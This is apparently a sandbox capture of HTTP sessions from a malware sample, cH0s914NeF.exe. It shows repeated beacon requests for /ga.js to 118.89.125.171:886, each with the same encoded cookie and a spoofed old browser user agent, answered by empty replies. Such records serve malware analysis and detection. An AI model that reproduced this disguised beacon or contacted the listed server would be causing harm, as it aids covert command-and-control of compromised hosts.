Apr 20, 2024 15:23:08.148915052 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:08.470316887 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49801	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:08.897207975 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:09.213671923 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	49802	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:09.648607016 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:09.972042084 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49803	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:11.418049097 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:11.744184017 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49804	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:12.183238029 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:12.498246908 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49805	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:12.941323042 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:13.264950991 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49806	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:13.697618961 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:14.018640041 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49809	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:14.435367107 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:14.744247913 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49810	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:15.215039968 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:15.528629065 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49811	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:15.961918116 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:16.283004999 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49812	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:16.710163116 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:17.027992010 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49813	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:17.461960077 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:17.783049107 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	49814	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:18.208388090 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:18.521872044 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	49815	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:18.959839106 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:19.277350903 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49816	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:19.762662888 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:20.086500883 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49817	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:20.521791935 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:20.837831020 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	49818	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:21.262753010 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:21.570430040 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	49819	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:22.008919954 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:22.322663069 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	49820	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:22.754497051 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:23.070765972 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	49821	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:23.507806063 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:23.827956915 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49822	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:24.255585909 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:24.572716951 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	49823	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:25.015386105 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:25.341200113 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	49824	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:25.772286892 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:26.088541031 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	49825	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:26.518882990 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:26.835448027 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	49826	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:27.278711081 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:27.595928907 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	49827	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:28.018908978 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:28.325850010 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	49828	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:28.755717039 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:29.072902918 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	49829	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:29.510406017 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:29.828576088 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	49830	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
